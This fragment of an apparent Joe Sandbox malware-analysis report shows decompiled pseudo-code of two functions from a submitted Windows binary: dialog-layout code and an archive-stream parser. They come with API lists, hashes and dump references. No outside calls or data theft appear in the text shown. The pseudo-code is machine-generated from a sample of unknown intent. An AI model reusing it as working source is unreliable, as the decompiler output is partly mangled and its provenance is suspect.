Part of subcall function 00403AD9: GetCurrentObject.GDI32(00000000,00000007), ref: 00403BC9
Part of subcall function 00403AD9: SelectObject.GDI32(00000002,?), ref: 00403BD8
Part of subcall function 00403AD9: SelectObject.GDI32(00000000,?), ref: 00403BDE
Part of subcall function 00403AD9: DeleteDC.GDI32(00000002), ref: 00403BE9
Part of subcall function 00403AD9: DeleteDC.GDI32(00000000), ref: 00403BEC
Part of subcall function 00403AD9: ReleaseDC.USER32 ref: 00403BF2

GetObjectW.GDI32(00000000,00000018,?), ref: 00403D25
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00403D39
SendMessageW.USER32(?,00000172,00000000,?), ref: 00403D4B
GlobalFree.KERNEL32 ref: 00403D60

Strings

IMAGES, xrefs: 00403C71
STATIC, xrefs: 00403C3C

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: e5ee765c26b043088857a6b86632b5a939f6bbfc1f2247f6f7eb73e9a60df1c7
Instruction ID: 960f2b80fa602a6c7041f941df52aa7033470e9d81684b1270c43c97e0f3439f
Opcode Fuzzy Hash: e5ee765c26b043088857a6b86632b5a939f6bbfc1f2247f6f7eb73e9a60df1c7
Instruction Fuzzy Hash: 28416D71A01218BBCB219FA4CC48DEFBF7DEF09751F108066F515B2290D7398A51DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00407BD3, Relevance: 27.3, APIs: 18, Instructions: 297
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00407BD3(void* __ecx, int __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				int _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				int _v32;
				struct tagRECT _v48;
				intOrPtr _t116;
				int _t118;
				int _t120;
				struct HWND__* _t131;
				int _t139;
				void* _t166;
				signed int _t168;
				int _t210;
				struct HWND__* _t211;
				long _t215;
				intOrPtr _t219;
				intOrPtr _t225;
				int _t231;
				int _t234;
				int _t235;
				void* _t239;

				_t234 = __edx;
				_t239 = __ecx;
				_v28 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				if((GetWindowLongW(GetDlgItem( *(__ecx + 4), 0x4b3), 0xfffffff0) & 0x10000000) != 0) {
					E00407A29(_t239, 0x4b3,  &_v48);
					_v28 = 0x4b3;
					_v16 = _v48.right.x - _v48.left;
					_v24 = _v48.bottom - _v48.top;
				}
				if((GetWindowLongW(GetDlgItem( *(_t239 + 4), 0x4b4), 0xfffffff0) & 0x10000000) != 0) {
					E00407A29(_t239, 0x4b4,  &_v48);
					_v28 = 0x4b4;
					_v8 = _v48.right.x - _v48.left;
					_v24 = _v48.bottom - _v48.top;
				}
				_t219 = _v16;
				_t116 = _v8;
				if(_t219 > 0 && _t116 > 0) {
					if(_t116 <= _t219) {
						_v8 = _t219;
						_t116 = _t219;
					} else {
						_v16 = _t116;
						_t219 = _t116;
					}
				}
				if(_v28 == 0) {
					L15:
					_t118 = _v12 + 0x1a;
					if(_t118 >  *(_t239 + 0x14)) {
						 *(_t239 + 0x14) = _t118;
					}
					_v12 = _t118 - 0x1a;
					_t120 = GetSystemMetrics(0x10);
					_v32 = GetSystemMetrics(0x11);
					 *(_t239 + 0x14) =  *(_t239 + 0x14) + GetSystemMetrics(8);
					 *(_t239 + 0x18) =  *(_t239 + 0x18) + GetSystemMetrics(7);
					asm("cdq");
					_t210 = _t120 -  *(_t239 + 0x14) - _t234 >> 1;
					asm("cdq");
					_v20 = _v32 -  *(_t239 + 0x18) - _t234 >> 1;
					_t131 = GetParent( *(_t239 + 4));
					_v32 = _t131;
					if(_t131 != 0) {
						GetClientRect(_t131,  &_v48);
						ClientToScreen(_v32,  &_v48);
						ClientToScreen(_v32,  &(_v48.right));
						_t215 = _v48.left;
						_t235 =  *(_t239 + 0x14);
						_t231 = _v48.top;
						_v20 = _t231;
						if(_v48.right.x - _t215 > _t235) {
							asm("cdq");
							_t215 = (_v48.right.x - _t235 - _t215 - _t235 >> 1) + _v48.left;
						}
						_t234 =  *(_t239 + 0x18);
						if(_v48.bottom - _t231 > _t234) {
							asm("cdq");
							_v20 = (_v48.bottom - _t234 - _t231 - _t234 >> 1) + _t231;
						}
						_t210 = _t215 + 0xa;
						_v20 = _v20 + 0xa;
					}
					SetWindowPos( *(_t239 + 4), 0, _t210, _v20,  *(_t239 + 0x14),  *(_t239 + 0x18), 4);
					_t211 = 0;
					if( *((intOrPtr*)(_t239 + 0x30)) == 0) {
						E00407BA4(_t239, 0x4b2, 0xc, 0xa,  *((intOrPtr*)(_t239 + 0x28)) + 1,  *((intOrPtr*)(_t239 + 0x2c)) + 1, 0);
					} else {
						SetWindowPos(GetDlgItem( *(_t239 + 4), 0x4b1), 0, 0xc, 0xc, 0, 0, 5);
						E00407A29(_t239, 0x4b1,  &_v48);
						_t225 =  *((intOrPtr*)(_t239 + 0x2c));
						_t166 = 2;
						_v48.bottom = _v48.bottom + _t166 - _v48.top;
						if(_t225 >= _v48.bottom) {
							_t168 = 0;
						} else {
							asm("cdq");
							_t168 = _v48.bottom - _t225 - _t234 >> 1;
						}
						E00407BA4(_t239, 0x4b2, _v48.right.x + 0xb, _t168 + 0xa,  *((intOrPtr*)(_t239 + 0x28)) + 1, _t225 + 1, 0);
						_t211 = 0;
					}
					if(_v28 != _t211) {
						GetClientRect( *(_t239 + 4),  &_v48);
						if(_v16 == _t211 || _v8 == _t211) {
							_push(1);
							_push(_t211);
							_push(_t211);
							_push(_v48.bottom - _v24 - 0xa);
							asm("cdq");
							_push(_v48.right.x - _v12 - _t234 >> 1);
							_push(_v28);
						} else {
							asm("cdq");
							E00407BA4(_t239, 0x4b3, _v48.right.x - _v12 - _t234 >> 1, _v48.bottom - _v24 - 0xa, _v16, _v24, _t211);
							E00407A29(_t239, 0x4b3,  &_v48);
							_push(0);
							_push(_v24);
							_push(_v8);
							_push(_v48.top);
							_push(_v48.right.x + 0xa);
							_push(0x4b4);
						}
						E00407BA4(_t239);
					}
					 *(_t239 + 0x14) =  *(_t239 + 0x14) - GetSystemMetrics(8);
					_t139 = GetSystemMetrics(7);
					 *(_t239 + 0x18) =  *(_t239 + 0x18) - _t139;
					return _t139;
				} else {
					if(_t219 == 0) {
						L13:
						_v12 = _t116;
						goto L15;
					}
					if(_t116 == 0) {
						_v12 = _t219;
						goto L15;
					}
					_t116 = _t116 + _t219 + 0xa;
					goto L13;
				}
			}

0x00407bd3
0x00407be9
0x00407bef
0x00407bf2
0x00407bf5
0x00407bf8
0x00407c0b
0x00407c14
0x00407c1f
0x00407c22
0x00407c2b
0x00407c2b
0x00407c47
0x00407c50
0x00407c5b
0x00407c5e
0x00407c67
0x00407c67
0x00407c6a
0x00407c6d
0x00407c72
0x00407c7a
0x00407c83
0x00407c86
0x00407c7c
0x00407c7c
0x00407c7f
0x00407c7f
0x00407c7a
0x00407c8c
0x00407ca2
0x00407ca5
0x00407cab
0x00407cad
0x00407cad
0x00407cbb
0x00407cbe
0x00407cc8
0x00407ccd
0x00407cd4
0x00407cdf
0x00407cea
0x00407cec
0x00407cf1
0x00407cf4
0x00407cfa
0x00407cff
0x00407d06
0x00407d19
0x00407d22
0x00407d24
0x00407d2a
0x00407d2d
0x00407d32
0x00407d37
0x00407d40
0x00407d47
0x00407d47
0x00407d4d
0x00407d54
0x00407d5d
0x00407d64
0x00407d64
0x00407d67
0x00407d6a
0x00407d6a
0x00407d7f
0x00407d85
0x00407d8a
0x00407e10
0x00407d8c
0x00407da5
0x00407db2
0x00407db7
0x00407dbc
0x00407dc0
0x00407dc6
0x00407dd4
0x00407dc8
0x00407dcd
0x00407dd0
0x00407dd0
0x00407df1
0x00407df6
0x00407df6
0x00407e18
0x00407e25
0x00407e2e
0x00407e8a
0x00407e8c
0x00407e90
0x00407e91
0x00407e98
0x00407e9d
0x00407e9e
0x00407e35
0x00407e53
0x00407e5a
0x00407e66
0x00407e6e
0x00407e70
0x00407e76
0x00407e79
0x00407e7c
0x00407e7d
0x00407e7d
0x00407ea3
0x00407ea3
0x00407eac
0x00407eb1
0x00407eb3
0x00407eba
0x00407c8e
0x00407c90
0x00407c9a
0x00407c9a
0x00000000
0x00407c9a
0x00407c94
0x00407c9f
0x00000000
0x00407c9f
0x00407c96
0x00000000
0x00407c96

APIs

GetDlgItem.USER32 ref: 00407BFB
GetWindowLongW.USER32(00000000,000000F0), ref: 00407C00
GetDlgItem.USER32 ref: 00407C37
GetWindowLongW.USER32(00000000,000000F0), ref: 00407C3C
GetSystemMetrics.USER32 ref: 00407CBE
GetSystemMetrics.USER32 ref: 00407CC4
GetSystemMetrics.USER32 ref: 00407CCB
GetSystemMetrics.USER32 ref: 00407CD2
GetParent.USER32(?), ref: 00407CF4
GetClientRect.USER32 ref: 00407D06
ClientToScreen.USER32(?,?), ref: 00407D19
SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407D7F
GetDlgItem.USER32 ref: 00407D9E
SetWindowPos.USER32(00000000), ref: 00407DA5
GetClientRect.USER32 ref: 00407E25

Part of subcall function 00407BA4: GetDlgItem.USER32 ref: 00407BC2
Part of subcall function 00407BA4: SetWindowPos.USER32(00000000), ref: 00407BC9

ClientToScreen.USER32(?,?), ref: 00407D22

Part of subcall function 00407A29: GetDlgItem.USER32 ref: 00407A31

GetSystemMetrics.USER32 ref: 00407EAA
GetSystemMetrics.USER32 ref: 00407EB1

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: MetricsSystem$ItemWindow$Client$LongRectScreen$Parent
String ID:
API String ID: 2671006076-0
Opcode ID: 4741c276581009abfc9ca523c20e9ec6d8d94d55c1504a4e144b8b0e00fc264d
Instruction ID: 7001ee707cf972b195794562609621f769ecf2f41514bcadc40e6201da9538ee
Opcode Fuzzy Hash: 4741c276581009abfc9ca523c20e9ec6d8d94d55c1504a4e144b8b0e00fc264d
Instruction Fuzzy Hash: 3CA11A71E04209AFDB10CFBDCD85AAEBBF9EF48704F148529E505F2291D778E9008B65

Uniqueness

Uniqueness Score: -1.00%

Function 004176DE, Relevance: 19.9, APIs: 13, Instructions: 398
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E004176DE(signed int __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, short _a12, signed int _a16, intOrPtr _a20, char _a24, signed int _a28, signed int _a32, unsigned int _a36, unsigned int _a40, unsigned int _a44, void* _a48, signed int _a52, signed int _a56, unsigned int _a60, unsigned int _a64, unsigned int _a68, signed int _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, signed int _a92, signed int _a96, char _a100, intOrPtr* _a104, signed int _a108, signed int _a112, unsigned int _a116, signed int _a120, signed int _a124) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v92;
				char _v117;
				char _v148;
				signed int _v408;
				void* _v460;
				char _v1308606084;
				void* __ebx;
				signed int __edi;
				signed int* __esi;
				void* __ebp;
				signed int _t471;
				intOrPtr _t472;
				signed int _t478;
				signed int _t479;
				signed int _t484;
				signed int _t485;
				void* _t495;
				void* _t497;
				signed int _t500;
				signed int _t510;
				signed int _t514;
				signed int _t519;
				signed int _t520;
				signed int _t525;
				intOrPtr* _t528;
				signed int _t529;
				signed int _t530;
				void* _t531;
				void* _t533;
				signed int _t537;
				void* _t541;
				signed int _t543;
				signed int _t557;
				void* _t575;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				intOrPtr* _t580;
				signed int _t581;
				unsigned int _t584;
				signed int _t586;
				signed int _t598;
				signed int _t609;
				signed int _t618;
				signed int _t632;
				signed int _t641;
				unsigned int _t643;
				void* _t647;
				signed int _t664;
				signed int _t684;
				signed int _t704;
				signed int _t706;
				signed int _t708;
				signed int _t709;
				signed int _t712;
				signed int _t715;
				signed int _t716;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				intOrPtr* _t724;
				intOrPtr* _t725;
				void* _t726;
				signed int _t727;
				signed int _t729;
				intOrPtr* _t734;
				intOrPtr* _t735;
				signed int _t737;
				void* _t739;
				void* _t740;
				signed int _t743;
				void* _t749;

				_t749 = __eflags;
				_t735 =  &_v92;
				_t740 = _t739 - 0xec;
				_push(_t726);
				_t715 = __ecx;
				_a76 = __ecx;
				E00415A5E( &_v52);
				_a60 = 0;
				_a64 = 0;
				_a68 = 0;
				_a36 = 0;
				_a40 = 0;
				_a44 = 0;
				_a48 = 0;
				_a52 = 0;
				_a56 = 0;
				E004175D3(0, __ecx, __edx, _t726, _t749, 0, _a104,  &_v52,  &_a60,  &_a36);
				_t467 = E004140DA( &_v148, _t749,  *(_t715 + 0x78) & 0x000000ff);
				_t727 = 0;
				_a84 = 0;
				if(_v48 > 0) {
					while(1) {
						_a80 = E00416AC0(_t467, _a108);
						_t471 = ( *( *_t735 + _t727) & 0x000000ff) +  *((intOrPtr*)(_v8 + _t727 * 4));
						_t618 = _v12;
						_t716 =  *(_t618 + _t471 * 8);
						_t472 =  *((intOrPtr*)(_t618 + 4 + _t471 * 8));
						__eflags = _t716 - _t716;
						if(_t716 != _t716) {
							break;
						}
						__eflags = 0 - _t472;
						if(0 != _t472) {
							break;
						} else {
							_t479 = E0040BCC0(_a80, _t716);
							_push(0x14);
							L004191BC();
							__eflags = _t479;
							if(_t479 == 0) {
								_t727 = 0;
								__eflags = 0;
							} else {
								 *((intOrPtr*)(_t479 + 4)) = 0;
								 *_t479 = 0x41c7d8;
								_t727 = _t479;
							}
							__eflags = _t727;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t727 + 4))(_t727);
							}
							 *((intOrPtr*)(_t727 + 8)) =  *_a80;
							 *((intOrPtr*)(_t727 + 0x10)) = 0;
							 *(_t727 + 0xc) = _t716;
							asm("adc ecx, [ebp+0x64]");
							_t484 = E004142CC( &_v148,  *_a104 + _a96, _t727, __eflags,  *_a76,  *_a104 + _a96,  *((intOrPtr*)(_a104 + 4)),  &_v52, _a84, 0, _t727, 0, 0, _a112, _a116, _a120, _a124);
							_a72 = _t484;
							__eflags = _t484;
							if(_t484 != 0) {
								L17:
								 *((intOrPtr*)( *_t727 + 8))(_t727);
								E00414DA0( &_v148);
								_push(_a48);
								L004191B0();
								_push(_a36);
								L004191B0();
								_push(_a60);
								L004191B0();
								E004156A7( &_v52);
								_t478 = _a72;
								goto L2;
							} else {
								_t485 = E0041638F( &_v40, _a84);
								__eflags = _t485;
								if(_t485 == 0) {
									L14:
									 *((intOrPtr*)( *_t727 + 8))(_t727);
									_a84 = _a84 + 1;
									_t467 = _a84;
									__eflags = _a84 - _v48;
									if(_a84 < _v48) {
										_t727 = _a84;
										continue;
									} else {
										_t715 = _a76;
										goto L1;
									}
								} else {
									_t703 = _t716;
									_a80 = _v28 + _a84 * 4;
									_t495 = E00418D30( *_a80, _t703);
									_t632 = _a80;
									__eflags = _t495 -  *_t632;
									if(_t495 !=  *_t632) {
										E00415EBA(_t632, _t716);
										asm("int3");
										_push(_t735);
										_t737 = _t740 - 0x64;
										_t743 = _t740 - 0x90;
										_push(0);
										_push(_t727);
										_t729 = _t632;
										_push(_t716);
										_t497 = E00416087( *(_t729 + 0x38));
										_t609 = _a108;
										__eflags = _t497 - 2;
										if(_t497 != 2) {
											_t718 = 0;
											__eflags = 0;
										} else {
											_t718 = 0;
											__eflags = _t703;
											if(__eflags == 0) {
												E00416899(_t729, _t703, __eflags, _t609 + 0xe0);
												_t497 = E00416087( *(_t729 + 0x38));
											}
										}
										_a72 = _t718;
										_a76 = _t718;
										_a80 = _t718;
										__eflags = _t497 - 3;
										if(_t497 != 3) {
											L28:
											_a36 = _t718;
											_a40 = _t718;
											_a44 = _t718;
											_v44 = _t718;
											_v40 = _t718;
											_v36 = _t718;
											_v32 = _t718;
											_v28 = _t718;
											_v24 = _t718;
											__eflags = _t497 - 4;
											if(_t497 == 4) {
												__eflags = _t703 - _t718;
												if(__eflags == 0) {
													_t724 = _t609 + 0xf8;
													E004175D3(_t609, _t729, _t703, _t729, __eflags,  &_a72, _t724, _t609,  &_a36,  &_v44);
													 *_t724 =  *_t724 +  *((intOrPtr*)(_t609 + 0xf0));
													asm("adc [edi+0x4], eax");
													_t497 = E00416087( *(_t729 + 0x38));
													_t718 = 0;
													__eflags = 0;
												}
											}
											 *(_t609 + 0x5c) = _t718;
											__eflags = _t497 - 5;
											if(__eflags != 0) {
												L104:
												E00416630(_t609, _t609, _t703, __eflags);
												_push(_v32);
												L004191B0();
												_push(_v44);
												L004191B0();
												_push(_a36);
												L004191B0();
												E0041673C( &_a72);
												_t500 = 0;
												__eflags = 0;
												goto L105;
											} else {
												__eflags = _t703 - _t718;
												if(__eflags == 0) {
													_a108 = E004160BB( *(_t729 + 0x38), _t703, _t729, __eflags);
													E00416309(_t609 + 0x58, _t501);
													 *(_t609 + 0x5c) = _a108;
													E004166F2(_t609 + 0x108, _t703, 9, _t718);
													E004166F2(_t609 + 0x108, _t703, 6, _t718);
													__eflags = _a108 - _t718;
													if(__eflags > 0) {
														__eflags = _v40 - _t718;
														if(__eflags != 0) {
															E004166F2(_t609 + 0x108, _t703, 0xa, _t718);
														}
													}
													_t720 = _a108;
													_a60 = 0;
													_a64 = 0;
													_a68 = 0;
													E004167C5( &_a60, _t720, __eflags);
													_a24 = 0;
													_a28 = 0;
													_a32 = 0;
													_a48 = 0;
													_a52 = 0;
													_a56 = 0;
													_a124 = 0;
													while(1) {
														L86:
														_t510 = E00416087( *(_t729 + 0x38));
														_t641 =  *(_t729 + 0x38);
														_a92 = _t510;
														__eflags = _t510 | _t703;
														_a96 = _t703;
														if((_t510 | _t703) == 0) {
															break;
														}
														_a84 = E00416087(_t641);
														_t513 =  *(_t729 + 0x38);
														_t643 =  *((intOrPtr*)( *(_t729 + 0x38) + 4)) -  *((intOrPtr*)( *(_t729 + 0x38) + 8));
														_a88 = _t703;
														_t703 = 0;
														__eflags = _a88;
														if(__eflags > 0) {
															L106:
															_t514 = E00415EBA(_t643, _t720);
															__eflags =  *((intOrPtr*)(_t643 + _t514 * 2)) - _t720;
															if( *((intOrPtr*)(_t643 + _t514 * 2)) != _t720) {
																asm("lock mov eax, [esi+0x64]");
																_v8 = _t514;
																_v4 =  *((intOrPtr*)(_t729 + 0x68));
																_a8 =  *((intOrPtr*)(_t729 + 0x6c));
																asm("adc ecx, ebx");
																_v20 = _t703;
																 *((intOrPtr*)(_t720 + 0xf0)) =  *((intOrPtr*)(_t729 + 0x40)) + 0x20;
																 *(_t720 + 0xf4) = _t643;
																 *((intOrPtr*)(_t720 + 0x128)) = 0x20;
																 *(_t720 + 0x12c) = _t609;
																 *(_t720 + 0x130) = _t609;
																__eflags = _v16 - _t609;
																if(__eflags < 0) {
																	L137:
																	_t519 = 0;
																	__eflags = 0;
																	goto L138;
																} else {
																	if(__eflags > 0) {
																		L125:
																		__eflags = _v4 - 0x40000000;
																		if(__eflags > 0) {
																			goto L137;
																		} else {
																			if(__eflags < 0) {
																				L128:
																				_t519 = _v8 | _v4;
																				__eflags = _t519;
																				if(_t519 != 0) {
																					__eflags =  *((intOrPtr*)(_t720 + 0x134)) - _t609;
																					if( *((intOrPtr*)(_t720 + 0x134)) == _t609) {
																						 *(_t720 + 0x130) = 1;
																					}
																					asm("adc ecx, ebx");
																					 *((intOrPtr*)(_t729 + 0x70)) =  *((intOrPtr*)(_t729 + 0x70)) + _v8 + 0x20;
																					asm("adc [esi+0x74], ecx");
																					_t525 = _v8 + _t703;
																					_t704 = _v4;
																					asm("adc edx, [ebp-0x10]");
																					_v28 = _t525;
																					asm("adc ecx, ebx");
																					 *((intOrPtr*)(_t720 + 0x128)) = _t525 + 0x20;
																					 *(_t720 + 0x12c) = _t704;
																					_t647 =  *((intOrPtr*)(_t729 + 0x48)) -  *((intOrPtr*)(_t720 + 0xf0));
																					asm("sbb eax, [edi+0xf4]");
																					__eflags =  *((intOrPtr*)(_t729 + 0x4c)) - _t704;
																					if(__eflags > 0) {
																						L140:
																						_t528 =  *_t729;
																						_t520 =  *((intOrPtr*)( *_t528 + 0x10))(_t528, _v20, _v16, 1, _t609);
																						__eflags = _t520 - _t609;
																						if(_t520 == _t609) {
																							_t529 = _v8;
																							__eflags = _t529 - _t529;
																							if(_t529 != _t529) {
																								L143:
																								_t520 = 0x8007000e;
																							} else {
																								__eflags = _t609 - _v4;
																								if(_t609 == _v4) {
																									_push(_v8);
																									L004191BC();
																									_v28 = _t529;
																									_t530 = E00413818(_v8); // executed
																									__eflags = _t530 - _t609;
																									if(_t530 == _t609) {
																										_t706 = _v8;
																										_t651 = _v28;
																										_t531 = E00418D30(_v28, _t706);
																										__eflags = _t531 - _a8;
																										if(_t531 != _a8) {
																											L148:
																											E00415EBA(_t651, _t720);
																										}
																										__eflags =  *((intOrPtr*)(_t720 + 0x134)) - _t609;
																										if( *((intOrPtr*)(_t720 + 0x134)) == _t609) {
																											 *((char*)(_t720 + 0x131)) = 1;
																										}
																										_push(_t609);
																										_v16 = _t609;
																										E004163AA( &_v20, _t729, _v28, _v8);
																										_t651 =  *(_t729 + 0x38);
																										_v12 = _t609;
																										_v8 = _t609;
																										_v4 = _t609;
																										_t533 = E00416087( *(_t729 + 0x38));
																										__eflags = _t533 - 1;
																										if(_t533 != 1) {
																											L153:
																											__eflags = _t533 - 0x17;
																											if(_t533 != 0x17) {
																												goto L148;
																											} else {
																												__eflags = _t706 - _t609;
																												if(__eflags != 0) {
																													goto L148;
																												} else {
																													_push(_a24);
																													_push(_a20);
																													_t651 = _t729;
																													_push(_a16);
																													_t537 = E004176DE(_t729, _t706, __eflags,  *((intOrPtr*)(_t720 + 0xf0)),  *(_t720 + 0xf4), _t720 + 0x100,  &_v12, _a12);
																													_a8 = _t537;
																													__eflags = _t537 - _t609;
																													if(_t537 == _t609) {
																														__eflags = _v8 - _t609;
																														if(_v8 != _t609) {
																															__eflags = _v8 - 1;
																															if(_v8 > 1) {
																																goto L148;
																															} else {
																																E00415EF3( &_v20);
																																E004163D4(_t729,  *_v12);
																																_t651 =  *(_t729 + 0x38);
																																_t541 = E00416087( *(_t729 + 0x38));
																																__eflags = _t541 - 1;
																																if(_t541 != 1) {
																																	goto L148;
																																} else {
																																	__eflags = _t706 - _t609;
																																	if(_t706 != _t609) {
																																		goto L148;
																																	} else {
																																		goto L162;
																																	}
																																}
																															}
																														} else {
																															E0041673C( &_v12);
																															E00415EF3( &_v20);
																															goto L146;
																														}
																													} else {
																														E0041673C( &_v12);
																														E00415EF3( &_v20);
																														_t609 = _a8;
																														goto L146;
																													}
																												}
																											}
																										} else {
																											__eflags = _t706 - _t609;
																											if(_t706 == _t609) {
																												L162:
																												_push(_a24);
																												 *(_t720 + 0x130) = 1;
																												_push(_a20);
																												_push(_a16);
																												 *((intOrPtr*)(_t720 + 0x120)) =  *((intOrPtr*)(_t729 + 0x70));
																												_push(_a12);
																												_t543 =  *(_t729 + 0x74);
																												_push(_t720);
																												 *(_t720 + 0x124) = _t543;
																												L19();
																												E0041673C( &_v12);
																												E00415EF3( &_v20);
																												_push(_v28);
																												L004191B0();
																												_t520 = _t543;
																											} else {
																												goto L153;
																											}
																										}
																									} else {
																										_t609 = _t530;
																										L146:
																										_push(_v28);
																										L004191B0();
																										_t520 = _t609;
																									}
																								} else {
																									goto L143;
																								}
																							}
																						}
																					} else {
																						if(__eflags < 0) {
																							L136:
																							 *((char*)(_t720 + 0x133)) = 1;
																							goto L137;
																						} else {
																							__eflags = _t647 - _v28;
																							if(_t647 >= _v28) {
																								goto L140;
																							} else {
																								goto L136;
																							}
																						}
																					}
																				} else {
																					__eflags = _t703 | _v16;
																					if((_t703 | _v16) != 0) {
																						L138:
																						_t520 = _t519 + 1;
																						__eflags = _t520;
																					} else {
																						 *(_t720 + 0x130) = 1;
																					}
																				}
																			} else {
																				__eflags = _v8 - _t609;
																				if(_v8 > _t609) {
																					goto L137;
																				} else {
																					goto L128;
																				}
																			}
																		}
																	} else {
																		__eflags = _t703 - _t609;
																		if(_t703 < _t609) {
																			goto L137;
																		} else {
																			goto L125;
																		}
																	}
																}
															} else {
																_t664 = _t643 + 1;
																_t348 = _t729 - 0x1bffbe84;
																 *_t348 =  *(_t729 - 0x1bffbe84) + _t664;
																__eflags =  *_t348;
																if( *_t348 != 0) {
																	L115:
																	 *(_t720 + 0xec) = _t514;
																	_t664 =  *((intOrPtr*)(_t729 + 0x56));
																	goto L116;
																} else {
																	_t350 =  &_v1308606084;
																	 *_t350 = _v1308606084 + _t664;
																	__eflags =  *_t350;
																	if( *_t350 < 0) {
																		L116:
																		_t729 = _t729 - 1;
																		__eflags = _t729;
																		_push(_t729);
																		 *(_t720 + 0xe0) = _t664;
																		goto L117;
																	} else {
																		_t352 = _t720 - 0x3fffbe84;
																		 *_t352 =  *(_t720 - 0x3fffbe84) + _t703;
																		__eflags =  *_t352;
																		if( *_t352 != 0) {
																			L117:
																			_t664 =  *((intOrPtr*)(_t729 + 0x57));
																			_t609 = 0;
																			__eflags = 0;
																			goto L118;
																		} else {
																			_t708 = _t703 + _t703;
																			__eflags = _t708;
																			if(_t708 < 0) {
																				L118:
																				asm("fisttp dword [eax+0xe18f]");
																				goto L119;
																			} else {
																				_t709 = _t708 + _t708;
																				__eflags = _t709;
																				if(_t709 < 0) {
																					L119:
																					 *_t514 =  *_t514 + _t514;
																					 *_t514 =  *_t514 + _t609;
																					asm("lahf");
																					asm("loopne 0x2");
																					 *_t514 =  *_t514 + _t514;
																					__eflags =  *_t514;
																				} else {
																					_t354 = _t609 - 0x40ffbe84;
																					 *_t354 =  *(_t609 - 0x40ffbe84) + _t709;
																					__eflags =  *_t354;
																					if( *_t354 >= 0) {
																						_t356 =  &_v117;
																						 *_t356 = _v117 + _t709;
																						__eflags =  *_t356;
																						_push(_t737);
																						_t737 = _t743;
																						_t743 = _t743 - 0x1c;
																						_push(_t609);
																						_push(_t729);
																						_push(_t720);
																						_t720 = _v408;
																						_t729 = _t664;
																						E0041563D(_t720);
																						 *((intOrPtr*)(_t720 + 0xe8)) =  *((intOrPtr*)(_t729 + 0x40));
																						_t514 =  *(_t729 + 0x44);
																						goto L115;
																					}
																				}
																			}
																		}
																	}
																}
																 *_t720 =  *_t720 + _t664;
																__eflags = _t737;
																 *_t514 =  *_t514 + _t514;
																_t366 = _t609 + 0x4e8b6046;
																 *_t366 =  *(_t609 + 0x4e8b6046) + _t664;
																__eflags =  *_t366;
															}
															return _t520;
														} else {
															if(__eflags < 0) {
																L40:
																_push(1);
																_a4 = _t703;
																E004163AA(_t737, _t729,  *((intOrPtr*)(_t513 + 8)) +  *_t513, _a84);
																_t720 = 0;
																__eflags = _a96;
																if(__eflags > 0) {
																	L83:
																	 *((char*)(_t609 + 0x135)) = 1;
																	 *((intOrPtr*)( *(_t729 + 0x38) + 8)) =  *((intOrPtr*)( *(_t729 + 0x38) + 4));
																	goto L84;
																} else {
																	if(__eflags < 0) {
																		L43:
																		_t557 = _a92 + 0xfffffff2;
																		__eflags = _t557 - 0xb;
																		if(__eflags > 0) {
																			goto L83;
																		} else {
																			switch( *((intOrPtr*)(_t557 * 4 +  &M00417E72))) {
																				case 0:
																					__eax =  &_a60;
																					__ecx = __esi;
																					__eax = E004168E5(__esi, __edx, _a108,  &_a60);
																					__eax = 0;
																					_a124 = __edi;
																					__eflags = _a64 - __edi;
																					if(__eflags > 0) {
																						do {
																							__ecx = _a60;
																							__eflags =  *((char*)(__ecx + __eax));
																							if( *((char*)(__ecx + __eax)) != 0) {
																								_t244 =  &_a124;
																								 *_t244 = _a124 + 1;
																								__eflags =  *_t244;
																							}
																							__eax = __eax + 1;
																							__eflags = __eax - _a64;
																						} while (__eflags < 0);
																					}
																					__edi = _a124;
																					 &_a24 = E004167C5( &_a24, __edi, __eflags);
																					 &_a48 = E004167C5( &_a48, __edi, __eflags);
																					goto L54;
																				case 1:
																					__eax =  &_a24;
																					goto L67;
																				case 2:
																					__eax =  &_a48;
																					L67:
																					__ecx = __esi;
																					__eax = E004168E5(__ecx, __edx, _a124, __eax);
																					goto L54;
																				case 3:
																					_v16 = _t720;
																					E004167E7( &_v20, _t703, _t737, __eflags, _t729,  &_a72);
																					_t720 =  *((intOrPtr*)( *(_t729 + 0x38) + 4)) -  *((intOrPtr*)( *(_t729 + 0x38) + 8));
																					E0040BCC0(_t609 + 0xd0, _t720);
